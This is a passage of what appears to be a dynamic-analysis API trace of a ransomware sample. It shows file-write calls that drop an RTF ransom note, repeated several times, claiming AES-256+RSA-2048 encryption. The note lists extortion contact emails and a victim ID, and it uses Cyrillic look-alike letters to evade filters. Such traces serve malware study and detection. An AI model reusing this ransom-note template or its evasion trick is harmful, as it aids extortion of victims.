n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1ea3958, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n\x90iÁoA¯Ú8r\x13\x96\x02¶\x99\x84b\x9a\x15ܽ²ýe\x1c\x06\x86\x0bm\"_\x82¥Ç0Ó\x18â\x17ê\x1b¥!Î~Ð\x11\\\x13u¿Ò$½Iq¯/\x0f)Ý\x8cÄ7ÓPå8Ë]\x08¢hjß\x9bÕ\x81¯\x89±¢¾¹ÝÒl\x94\x90ª\x89®Y\x17P\x9aÜC꺬p¶<ã4xI}\x90\x12÷r4Ûñ\x95ôXÒ¸â,Ái\x9dP)\x08\x86ÍZí\x0f­ê%}¯\x96¹\x04^=<¥\r.Z\x97\x1bxy", lpUsedDefaultChar=0x0) returned 7247 [0066.460] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.462] CloseHandle (hObject=0x1cc) returned 1 [0066.462] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\bg85_info.rtf")) returned 0xffffffff [0066.462] GetLastError () returned 0x2 [0066.462] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.597] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.597] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur 